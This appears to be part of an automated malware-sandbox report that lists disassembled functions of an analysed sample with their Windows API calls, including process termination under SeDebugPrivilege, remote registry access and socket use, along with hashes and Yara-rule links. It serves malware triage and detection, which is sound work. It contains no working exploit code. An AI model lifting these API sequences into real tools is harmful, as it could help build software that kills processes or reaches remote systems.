                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0041B3F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: 6f4177733c21215a38e17460d17b9c29e268f32723162c25906eb8ad69078920
                                                                                • Instruction ID: c56ea80515c4ee2b06591eed13e67bbbc967b3b69dfc55905bf1e21e8860913a
                                                                                • Opcode Fuzzy Hash: 6f4177733c21215a38e17460d17b9c29e268f32723162c25906eb8ad69078920
                                                                                • Instruction Fuzzy Hash: AB51A430500218BBEF219F29CC85BDE7B65EB05318F648117FA25D62E1C779E9D08BD9
                                                                                Function 003CA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0042DB1B
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0042DB3C
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0042DB51
                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0042DB6E
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0042DB95
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,003CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0042DBA0
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0042DBBD
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,003CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0042DBC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                • Opcode ID: 530f96033e36d9a433fe0190676926ca63d6e2ca0dd0f50f5ec5c8f9de78c509
                                                                                • Instruction ID: 0c10926a32dfe69ff9eaaffbb9ead4933d840f1f9b8edab4eb980994e2bd35bd
                                                                                • Opcode Fuzzy Hash: 530f96033e36d9a433fe0190676926ca63d6e2ca0dd0f50f5ec5c8f9de78c509
                                                                                • Instruction Fuzzy Hash: DF516A70A00608EFDB21DF68DC92FAA7BB8BB18754F100529F946DA690D7B4EC90DB54
                                                                                Function 003F7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F5FA6,?), ref: 003F6ED8
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003F5FA6,?), ref: 003F6EF1
                                                                                  • Part of subcall function 003F72CB: GetFileAttributesW.KERNEL32(?,003F6019), ref: 003F72CC
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 003F75CA
                                                                                • _wcscmp.LIBCMT ref: 003F75E2
                                                                                • MoveFileW.KERNEL32(?,?), ref: 003F75FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 793581249-0
                                                                                • Opcode ID: fba1bb95b06c913321bbb1c66833bb44437011069e5d31564c9534cec52c5201
                                                                                • Instruction ID: cc53e0d7038da4dc72f1c8487b103f53aa637861982ccd9b8e8e8c6e42e275e6
                                                                                • Opcode Fuzzy Hash: fba1bb95b06c913321bbb1c66833bb44437011069e5d31564c9534cec52c5201
                                                                                • Instruction Fuzzy Hash: EC5143B290922D9BDF56EB94E841DEE73BC9F08310F0040AAF605E7541EB7497C9CB64
                                                                                Function 003CEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0042DAD1,00000004,00000000,00000000), ref: 003CEAEB
                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0042DAD1,00000004,00000000,00000000), ref: 003CEB32
                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0042DAD1,00000004,00000000,00000000), ref: 0042DC86
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0042DAD1,00000004,00000000,00000000), ref: 0042DCF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                • Opcode ID: 99b7afe2701b02a4fd544c2e395750f19314486915d8c224b5db064181218fa6
                                                                                • Instruction ID: 41d937dbff9e1a3b7dc72edaccee359cbcbe82b838f2808b7dc5fa0129acaad7
                                                                                • Opcode Fuzzy Hash: 99b7afe2701b02a4fd544c2e395750f19314486915d8c224b5db064181218fa6
                                                                                • Instruction Fuzzy Hash: F3412871B0C6809BD73B4B29AE8DF3B7A99AB41301F5A041EF047C6A61C774BC80D715
                                                                                Function 003EB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,003EAEF1,00000B00,?,?), ref: 003EB26C
                                                                                • HeapAlloc.KERNEL32(00000000,?,003EAEF1,00000B00,?,?), ref: 003EB273
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003EAEF1,00000B00,?,?), ref: 003EB288
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,003EAEF1,00000B00,?,?), ref: 003EB290
                                                                                • DuplicateHandle.KERNEL32(00000000,?,003EAEF1,00000B00,?,?), ref: 003EB293
                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,003EAEF1,00000B00,?,?), ref: 003EB2A3
                                                                                • GetCurrentProcess.KERNEL32(003EAEF1,00000000,?,003EAEF1,00000B00,?,?), ref: 003EB2AB
                                                                                • DuplicateHandle.KERNEL32(00000000,?,003EAEF1,00000B00,?,?), ref: 003EB2AE
                                                                                • CreateThread.KERNEL32(00000000,00000000,003EB2D4,00000000,00000000,00000000), ref: 003EB2C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: b479f4cda2f8d270e38a38f2b81eb7e9330087f2ef9fcfa1816d179d0aafa867
                                                                                • Instruction ID: 63418a4fd3022567f80dcd89291dd94909fd8dae533f79302db1f7c60b6cd5c1
                                                                                • Opcode Fuzzy Hash: b479f4cda2f8d270e38a38f2b81eb7e9330087f2ef9fcfa1816d179d0aafa867
                                                                                • Instruction Fuzzy Hash: 3001BBB5640344BFEB10ABA5EC49F6B7BACEB88711F019421FA05DB1A1CA749C00CB65
                                                                                Function 0040C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                • Opcode ID: 5dae217b7ba59e2f3b2eb75a6bf1073a3a7c349ef30a78365b44be2b55a2767e
                                                                                • Instruction ID: eabbe9302214f68247aa8c17316c24d2b9098da7631c8c605d1a72ea62798009
                                                                                • Opcode Fuzzy Hash: 5dae217b7ba59e2f3b2eb75a6bf1073a3a7c349ef30a78365b44be2b55a2767e
                                                                                • Instruction Fuzzy Hash: 6EE1A271A0021AEBDF14DFA4D881BAE77B5EB48354F14823AF905BB3C1D774AD418B98
                                                                                Function 004016DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                  • Part of subcall function 003CC6F4: _wcscpy.LIBCMT ref: 003CC717
                                                                                • _wcstok.LIBCMT ref: 0040184E
                                                                                • _wcscpy.LIBCMT ref: 004018DD
                                                                                • _memset.LIBCMT ref: 00401910
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                • String ID: X$p2Fl2F
                                                                                • API String ID: 774024439-2242726339
                                                                                • Opcode ID: 1987e1225942bbdea28e2eaa329adc83d562187eee6b3f7b3fac85d312306989
                                                                                • Instruction ID: 21b1629663c2d2b5bfe72e7faf7a0d495c3555b8e8536f2816e83fd671f37c01
                                                                                • Opcode Fuzzy Hash: 1987e1225942bbdea28e2eaa329adc83d562187eee6b3f7b3fac85d312306989
                                                                                • Instruction Fuzzy Hash: 62C19E316043409FC725EF24C981A9FB7E0BF85354F00492EF9999B6A2EB74ED05CB86
                                                                                Function 00419A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00419B19
                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00419B2D
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00419B47
                                                                                • _wcscat.LIBCMT ref: 00419BA2
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00419BB9
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00419BE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcscat
                                                                                • String ID: SysListView32
                                                                                • API String ID: 307300125-78025650
                                                                                • Opcode ID: 670ee43d69decd848c83c31c1a662b2edc9e5bcb84a3175d4f48d28d67c49b31
                                                                                • Instruction ID: e13876714f07d2e74d8fbe3fbcccd6dbf89ab6f32308230545e84fc41a47a02b
                                                                                • Opcode Fuzzy Hash: 670ee43d69decd848c83c31c1a662b2edc9e5bcb84a3175d4f48d28d67c49b31
                                                                                • Instruction Fuzzy Hash: EC41A171A00348ABDB219FA4DC85FEF77A8EF08350F10442BF589A7291D7799D85CB68
                                                                                Function 0041172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003F6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003F6554
                                                                                  • Part of subcall function 003F6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 003F6564
                                                                                  • Part of subcall function 003F6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003F65F9
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041179A
                                                                                • GetLastError.KERNEL32 ref: 004117AD
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004117D9
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411855
                                                                                • GetLastError.KERNEL32(00000000), ref: 00411860
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411895
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: 651f5328f97fa1d93902021ed1a6d8738e233d5889263ac89592f1cffadd2ade
                                                                                • Instruction ID: 38dd913db6c87b39162bc303a93d472ecd93b14b8dc1a3bc5b7c7dcd43a77cd0
                                                                                • Opcode Fuzzy Hash: 651f5328f97fa1d93902021ed1a6d8738e233d5889263ac89592f1cffadd2ade
                                                                                • Instruction Fuzzy Hash: FD419E71600205AFDB06EF54C895FBEB7A1AF54310F04C05AFA069F3E2DB78A9418B59
                                                                                Function 003F5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 003F58B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: feea46f3995ec87f2b0f66c94d82763566723d3a8dd7d68844c73ba604589aa5
                                                                                • Instruction ID: 6398aba8573158ccfa45e0ff94861f1434c0c9d15e7797907366f3237b2bc4c0
                                                                                • Opcode Fuzzy Hash: feea46f3995ec87f2b0f66c94d82763566723d3a8dd7d68844c73ba604589aa5
                                                                                • Instruction Fuzzy Hash: A611EE3270974ABAE7175F54EC42E7A379CAF25764F30003BF751A5781E76499004269
                                                                                Function 003FA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 003FA806
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafeVartype
                                                                                • String ID:
                                                                                • API String ID: 1725837607-0
                                                                                • Opcode ID: 7fed48bca004d1fddfa124d5562ea7bfb9171c55fb25da3088d7c6ab9a393540
                                                                                • Instruction ID: 145a86f3145942c8e5edfc25b8c06fcf0b4b14596983978b21a5412a32a841f1
                                                                                • Opcode Fuzzy Hash: 7fed48bca004d1fddfa124d5562ea7bfb9171c55fb25da3088d7c6ab9a393540
                                                                                • Instruction Fuzzy Hash: F9C18BB5A0461A9FDB06DF98D481BBEB7F4EF08311F20806AE619EB341C774A945CB91
                                                                                Function 003F6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003F6B63
                                                                                • LoadStringW.USER32(00000000), ref: 003F6B6A
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003F6B80
                                                                                • LoadStringW.USER32(00000000), ref: 003F6B87
                                                                                • _wprintf.LIBCMT ref: 003F6BAD
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003F6BCB
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 003F6BA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 3648134473-3128320259
                                                                                • Opcode ID: 625cf697cee595bbecef13728b8fa2d09277652b57b748178800f354a4206063
                                                                                • Instruction ID: e64334a8e2b0622218d54874b24134b160ebcc07e67ffcbbdf0e8ef34a545ac7
                                                                                • Opcode Fuzzy Hash: 625cf697cee595bbecef13728b8fa2d09277652b57b748178800f354a4206063
                                                                                • Instruction Fuzzy Hash: 8B0186F2D002087FEB11ABD0AD89EF7336CD704304F0044A2B745D2141EA749E848F74
                                                                                Function 00412B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00412BF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharConnectRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 2595220575-0
                                                                                • Opcode ID: f7e3e8d590fc3d02451b1b3a21ba5364b276f0db8de8207cb8f9cc70bd91de53
                                                                                • Instruction ID: f1219d7924cde9bff42282bb7b1523433c50d61b3eb9f98c258a62c0b0bb7b88
                                                                                • Opcode Fuzzy Hash: f7e3e8d590fc3d02451b1b3a21ba5364b276f0db8de8207cb8f9cc70bd91de53
                                                                                • Instruction Fuzzy Hash: 9A9188316042009FCB11EF14D981FAEB7E5FF88314F04881EFA969B2A1DB74E955CB46
                                                                                Function 004095BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • select.WSOCK32 ref: 00409691
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0040969E
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004096C8
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004096E9
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004096F8
                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 004097AA
                                                                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0044DC00), ref: 00409765
                                                                                  • Part of subcall function 003ED2FF: _strlen.LIBCMT ref: 003ED309
                                                                                • _strlen.LIBCMT ref: 00409800
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                • String ID:
                                                                                • API String ID: 3480843537-0
                                                                                • Opcode ID: a5b886b62158ca64b9f3926adf9a31569eced090ab4c1bfb7e7c2ddadeb01a7c
                                                                                • Instruction ID: 28fbabe5c2d53f2e9079490936a3ed59e3f968ed608b19ad9d7d94af76a6c809
                                                                                • Opcode Fuzzy Hash: a5b886b62158ca64b9f3926adf9a31569eced090ab4c1bfb7e7c2ddadeb01a7c
                                                                                • Instruction Fuzzy Hash: FA81CF32504200ABC715EF64CC85F6BB7A8EF85714F104A2EF655AB2D2EB34DD05CB96
                                                                                Function 003DA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __mtinitlocknum.LIBCMT ref: 003DA991
                                                                                  • Part of subcall function 003D7D7C: __FF_MSGBANNER.LIBCMT ref: 003D7D91
                                                                                  • Part of subcall function 003D7D7C: __NMSG_WRITE.LIBCMT ref: 003D7D98
                                                                                  • Part of subcall function 003D7D7C: __malloc_crt.LIBCMT ref: 003D7DB8
                                                                                • __lock.LIBCMT ref: 003DA9A4
                                                                                • __lock.LIBCMT ref: 003DA9F0
